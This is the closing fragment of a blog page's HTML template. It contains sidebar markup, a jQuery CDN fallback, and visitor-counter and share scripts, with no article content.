    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "Sma11_Tim3"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


